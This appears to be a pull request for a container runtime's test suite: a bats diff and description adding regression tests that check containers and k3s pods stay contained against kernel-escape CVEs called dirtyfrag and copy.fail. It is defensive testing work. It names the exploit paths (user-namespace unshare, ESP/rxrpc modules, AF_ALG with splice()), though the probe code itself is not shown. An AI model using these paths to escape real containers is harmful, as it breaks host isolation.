+            --output jsonpath='{.status.phase}' 2>/dev/null || echo "Pending")
+        [[ $phase == "Succeeded" || $phase == "Failed" ]] && break
+        sleep 5
+    done
+    [[ $phase == "Succeeded" || $phase == "Failed" ]] ||
+        fail "Pod did not reach a terminal phase after 5 minutes (phase: $phase)"
+
+    run kubectl logs dirtyfrag
+    assert_success
+    refute_line --partial "ESCAPED" \
+        "Pod exploited dirtyfrag: esp4, esp6, or rxrpc module loaded despite wsl-init removal"
+    assert_line --partial "CONTAINED"
+
+    kubectl delete pod dirtyfrag --ignore-not-found || true
+}

--- a/bats/tests/security/cve-2026-43284-dirtyfrag.bats
+++ b/bats/tests/security/cve-2026-43284-dirtyfrag.bats
@@ -48,10 +48,6 @@ probe_mount_path() {
     fi
 }
 
-local_teardown_file() {
-    rdshell sudo rm -f "$VM_PROBE_PATH" || true
-}
-
 @test 'factory reset' {
     factory_reset
 }
@@ -68,8 +64,7 @@ local_teardown_file() {
 
 @test 'write probe to VM' {
     rdshell sudo tee "$VM_PROBE_PATH" <"$LOCAL_PROBE_SCRIPT" >/dev/null
-    run rdshell test -f "$VM_PROBE_PATH"
-    assert_success
+    rdshell test -f "$VM_PROBE_PATH"
 }
 
 @test 'container cannot exploit dirtyfrag' {
@@ -77,12 +72,11 @@ local_teardown_file() {
     # Rancher Desktop's seccomp profile (layer 1).  A default container does not
     # have CAP_SYS_ADMIN, so the seccomp rule denies the call with EPERM.
     ctrctl pull --quiet "$IMAGE_PYTHON"
-    run ctrctl run --rm \
+    run -0 ctrctl run --rm \
         -v "$(probe_mount_path):/probe.py:ro" \
         "$IMAGE_PYTHON" \
         python3 /probe.py
-    assert_success \
-        "Container exploited dirtyfrag: unshare was not blocked by seccomp"
+    assert_line --partial "CONTAINED"
 }
 
 @test 'pod cannot exploit dirtyfrag' {
@@ -114,8 +108,6 @@ spec:
       readOnly: true
 EOF
 
-    local phase
-    local i
     for i in $(seq 1 60); do
         phase=$(kubectl get pod dirtyfrag \
             --output jsonpath='{.status.phase}' 2>/dev/null || echo "Pending")
@@ -125,11 +117,9 @@ EOF
     [[ $phase == "Succeeded" || $phase == "Failed" ]] ||
         fail "Pod did not reach a terminal phase after 5 minutes (phase: $phase)"
 
-    run kubectl logs dirtyfrag
-    assert_success
-    refute_line --partial "ESCAPED" \
-        "Pod exploited dirtyfrag: esp4, esp6, or rxrpc module loaded despite wsl-init removal"
+    run -0 kubectl logs dirtyfrag
     assert_line --partial "CONTAINED"
+    refute_line --partial "ESCAPED"
 
     kubectl delete pod dirtyfrag --ignore-not-found || true
 }


### PR DESCRIPTION
## Summary

- Add three bats tests under `bats/tests/security/` for recent container/k3s kernel-escape CVEs:
  - **CVE-2026-43284** (dirtyfrag, XFRM ESP path) — also covers Copy_Fail2 (ESP-in-UDP `MSG_SPLICE_PAGES`) and its `esp6_input` IPv6 variant
  - **CVE-2026-43500** (dirtyfrag, AF_RXRPC + `pcbc(fcrypt)` path)
  - **CVE-2026-31431** (copy.fail, AF_ALG + `algif_aead` + `splice()`)
- Each test exercises the container-engine path (via `ctrctl run`) and the k3s pod path against a single VM with Kubernetes enabled. The bats suite runs once per `$RD_CONTAINER_ENGINE`, so cri-dockerd-backed k3s (under moby) and containerd-backed k3s (under containerd) are both covered without engine switching mid-file.
- The dirtyfrag probe checks both isolation layers independently: containers must be blocked by the seccomp `unshare(CLONE_NEWUSER|CLONE_NEWNET)` filter, and k3s pods must lack `esp4`, `esp6`, and `rxrpc` modules (any one present means ESCAPED).
- The copy.fail probe treats `algif_aead` absence as CONTAINED, so the test passes when `wsl-init` removes the module.
- Drive-by: switch the mirrored python image from `python:3.9-slim` (~10 GB across platforms) to `python:3.12-alpine`, drop the TODO in `bats/tests/helpers/images.bash`, and move the compose test to the shared `IMAGE_PYTHON` alias. The new security tests use `IMAGE_PYTHON` directly.

## Test plan

- [ ] `bats bats/tests/security/cve-2026-43284-dirtyfrag.bats` with `RD_CONTAINER_ENGINE=moby` and `containerd` on a patched VM — all subtests CONTAINED.
- [ ] `bats bats/tests/security/cve-2026-31431-copy-fail.bats` with each engine — all subtests CONTAINED.
- [ ] `bats bats/tests/compose/compose.bats` confirms the `IMAGE_PYTHON` rename still builds.
- [ ] Re-run `bats/scripts/ghcr-mirror.sh` to mirror `python:3.12-alpine` before merging.